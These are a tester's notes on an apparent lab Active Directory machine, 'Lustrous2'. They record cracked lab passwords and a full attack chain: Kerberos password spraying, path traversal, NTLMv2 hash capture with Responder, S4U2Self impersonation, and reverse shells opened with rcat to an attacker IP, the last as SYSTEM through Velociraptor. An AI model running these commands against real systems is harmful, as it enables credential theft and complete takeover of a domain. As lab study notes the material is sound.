Lustrous2
This is not a writeup, just my notes about the machine.
Operating System: Windows Server 2022 Standard
Chain: False
Credentials
Username
Password
Method
Scope
Emma.Bell
Summer2024!
Brute forcing
Domain User
Terence.Jordan
Lustrous2!
Brute forcing
Domain User
Thomas.Myers
Lustrous2024
Brute forcing
Domain User
SHARESVC
#1Service
LLMNR NTBNS poisoning
Domain Service Account
✅ Valid Usernames
Aaron.Norman
Adam.Barnes
Amber.Ward
Andrea.Smith
Ann.Lynch
Callum.Oliver
Carly.Walker
Chelsea.Smith
Chloe.Hammond
Christopher.Lawson
Claire.Parry
Darren.Lewis
Deborah.Jones
Dominic.West
Duncan.Smith
Elaine.Gallagher
Eleanor.Gregory
Emma.Bell
Francesca.Norman
Gary.Richards
Gerard.Ward
Glenn.Williams
Graeme.Pritchard
Harriet.Richardson
Henry.Connor
Howard.Robinson
Jacqueline.Phillips
Janice.Collier
Jasmine.Johnson
Joan.Wall
Judith.Francis
Justin.Williams
Kyle.Hussain
Kyle.Lloyd
Lawrence.Bryan
Leah.Elliott
Lewis.Khan
Liam.Wheeler
Lisa.Begum
Louis.Phillips
Lydia.Parker
Malcolm.Yates
Marie.Hill
Martin.Hamilton
Mathew.Roberts
Melissa.Thompson
Nathan.Carter
Nicola.Clarke
Nicola.Hall
Nigel.Lee
Pamela.Taylor
Robert.Russell
Ryan.Davies
Ryan.Moore
Ryan.Rowe
Samantha.Smith
Sara.Matthews
ShareSvc
Sharon.Birch
Sharon.Evans
Stacey.Barber
Stacey.Griffiths
Stephanie.Baxter
Stephanie.Davies
Steven.Sutton
Susan.Johnson
Terence.Jordan
Thomas.Myers
Tony.Davies
Victoria.Williams
Wayne.Taylor🔑 Passwords list
Summer2024!
Lustrous2!
Lustrous2024
#1ServiceInformation Gathering
# Nmap 7.94SVN scan initiated Wed Apr 16 15:21:21 2025 as: nmap -p- --open -T5 -Pn -n -A -oN ext_tcp_lustrous2_allports -vvv 10.10.114.231
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-16 19:33:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
55618/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
55851/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCService Enumeration
FTP
FTP anonymous login enabled.
❯ wget -m --no-passive ftp://ftp:ftp@10.10.114.231Valid usernames found inside the FTP service
Look at the valid username section.
File leaked the audit findings
File: ITSEC/audit_draft.txt
----------------------------------
Audit Report Issue Tracking
[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled
[Open] Weak User PasswordsDNS
Not vulnerable to DNS Zone Transfer
HTTP
The website use some type of authentication.
curl http://lus2dc.lustrous2.vl -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
X-Powered-By: ASP.NET
Date: Wed, 16 Apr 2025 21:28:37 GMTInitial Foothold
Abusing Weak Credentials
File: possible-passwords.txt
---------------------------------
lustrous
development
homes
hr
it
itsec
production
sec
winter
spring
summer
fallFile: custom.rules
---------------------------------
:
c
$1
$2
$3
$4
$5
$6
$7
$8
$9
$1!
$2!
$3!
$4!
$5!
$6!
$7!
$8!
$9!
$2 $0 $2 $4
$2 $0 $2 $5
$2 $0 $2 $4 $!
$2 $0 $2 $5 $!
c $2 $0 $2 $4
c $2 $0 $2 $5
c $2 $0 $2 $4 $!
c $2 $0 $2 $5 $!❯ hashcat --force possible-passwords.txt -r custom.rules --stdout | sort -u > mut_passwords.txtBrute forcing Kerberos
NTLM authentication is disabled (STATUS_NOT_SUPPORTED )and Kerberos authentication was used.
❯ cat users.txt | while read line; do /opt/kerbrute/kerbrute bruteuser -d lustrous2.vl --dc 10.10.114.231 mut_passwords.txt $line -v -t 100 | grep --color=never "VALID LOGIN";done
2025/04/16 17:18:59 > [+] VALID LOGIN: Emma.Bell@lustrous2.vl:Summer2024!
2025/04/16 17:19:58 > [+] VALID LOGIN: Terence.Jordan@lustrous2.vl:Lustrous2!
2025/04/16 17:20:00 > [+] VALID LOGIN: Thomas.Myers@lustrous2.vl:Lustrous2024Setting up Kerberos in my local computer
File: /etc/hosts
-----------------------
10.10.94.178 LUS2DC.Lustrous2.vl Lustrous2.vl LUS2DCFile: /etc/krb5.conf
--------------------------
[libdefaults]
default_realm = LUSTROUS2.VL
[realms]
LUSTROUS2.VL = {
kdc = 10.10.94.178
admin_server = 10.10.94.178
}
[domain_realm]
.lustrous2.vl = LUSTROUS2.VLRequesting Ticket Granting Ticket to authenticate into Web application
The tester previously got 401 Unauthorized due was not authenticated with Kerberos.
curl http://lus2dc.lustrous2.vl -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
X-Powered-By: ASP.NET
Date: Wed, 16 Apr 2025 21:28:37 GMTUsing valid credentials to request TGT.
❯ impacket-getTGT lustrous2.vl/Emma.Bell:Summer2024! -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Emma.Bell.ccacheAttempting to request the website with curl using Kerberos authentication.
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/' -I
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvRYGdwOopf3ALsYtJwX/1QAgdfZprXjjjIyInMZszgBJ7qgmvmkWukupJM3/vBWS8nLJ0NRhRiBwee8mrRojzvaLzAvXF6dTUw6bR+6C4/z+/SXd8QbHETNSq/YYLH/1Xb957F0SwbszCpjGJvEHv
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 17 Apr 2025 03:19:53 GMTSetting up Firefox to use Kerberos authentication
Navigate to: about:config
Key
Value
network.negotiate-auth.trusted-uris
.lustrous2.vl
network.negotiate-auth.delegation-uris
.lustrous2.vl
network.negotiate-auth.using-native-gsslib
true
Discovering Path Traversal vulnerability
Vulnerable parameter: fileName
Abusing Path Traversal to download web.config file.
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=../../web.config'
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 4E46018E-B73C-4E7B-8DA2-87855F22435A-->% Capturing ShareSvc's NTLMv2 Hash
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=\\10.8.5.48\Testing'
❯ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
<SNIF>
[SMB] NTLMv2-SSP Client : 10.10.94.178
[SMB] NTLMv2-SSP Username : LUSTROUS2\ShareSvc
[SMB] NTLMv2-SSP Hash : ShareSvc::LUSTROUS2:7690e22b2b8d57eb:8947641912174F1E60CDBC725C108B0E:0101000000000000004A7FAE00AFDB01CF12C9D34C36ADE900000000020008004E004C004B00380001001E00570049004E002D0037004500510045005400550052004C00490045004E0004003400570049004E002D0037004500510045005400550052004C00490045004E002E004E004C004B0038002E004C004F00430041004C00030014004E004C004B0038002E004C004F00430041004C00050014004E004C004B0038002E004C004F00430041004C0007000800004A7FAE00AFDB0106000400020000000800300030000000000000000000000000210000AF4DFB35102267BCA2807A12D0F747441622D31D20E985EDEC7ECFFC076110500A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000Brute forcing NTLMv2 Hash and retrieving the plain text credential.
❯ hashcat -m 5600 ShareSVC.ntlmv2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
SHARESVC::LUSTROUS2:7690e22b<SNIF>0000000000:#1ServiceAnalyzing data with Bloodhound
Script: kozmer
The tester was not able to execute the BloodHound ingestor. Instead, they used ldapsearch together with ldapsearch_parser.py to collect and convert LDAP data into a format compatible with BloodHound.
❯ ldapsearch -LLL -H ldap://lus2dc.lustrous2.vl -Y GSSAPI -b "DC=LUSTROUS2,DC=VL" -N -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' "(&(objectClass=*))" | tee output.txt
❯ python3 ldapsearch_parser.py output.txt ldapsearch_bofhound.txt
❯ pipx install bofhound
❯ bofhound --input ldapsearch_bofhound.txt --output /tmp/bh --zip
The group belongs to the Protected Users group, which enforces strict security restrictions. As a result, it is not possible to use techniques such as crafting Silver Tickets, NTLM authentication, or Kerberos delegation to impersonate the user. These protections are specifically designed to mitigate credential theft and abuse scenarios. However, in some specific cases, the S4U2Self Kerberos extension may allow a service account configured with appropriate delegation permissions to request a service ticket to itself on behalf of the protected user, potentially bypassing some of these restrictions under very controlled conditions.
Authenticating into the application as Share Admin user
❯ impacket-getTGT lustrous2.vl/SHARESVC:'#1Service' -dc-ip lustrous2.vl
❯ export KRB5CCNAME=SHARESVC.ccache
❯ impacket-getST -self -impersonate "Sharon.Birch" -k -no-pass lustrous2.vl/SHARESVC:'#1Service' -altservice HTTP/lus2dc.lustrous2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Darren.Lewis
[*] Requesting S4U2self
[*] Changing service from SHARESVC@LUSTROUS2.VL to HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
[*] Saving ticket in Darren.Lewis@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
❯ export KRB5CCNAME=Sharon.Birch@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccacheAnalyzing LuShare.dll
Linux DLL decompiler: CodemerxDecompile
The application has a functionality in /file/debug that allows to execute commands if the right PIN is passed.
Executing curl command to confirm Remote Command Execution
Sending Reverse shell using rcat tool
Tool: rcat
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Debug' -X POST --data-urlencode 'command=.\rcat.exe connect 10.8.5.48 1234' -d 'pin=ba45c518'
Privilege Escalation
Discovering Velociraptor software
PS C:\inetpub\lushare> get-itemproperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | select DisplayName,DisplayVersion,InstallLocation
DisplayName DisplayVersion InstallLocation
----------- -------------- ---------------
<SNIF>
Velociraptor 0.72.6 Creating an API client configuration as Administrator
PS C:\Program Files\VelociraptorServer> .\velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yamlSending Reverse shell using rcat tool to gain access as NT Authority System
PS C:\Program Files\VelociraptorServer> .\velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','c:\\Temp\\rcat.exe','connect','10.8.5.48','4444'])"
Last updated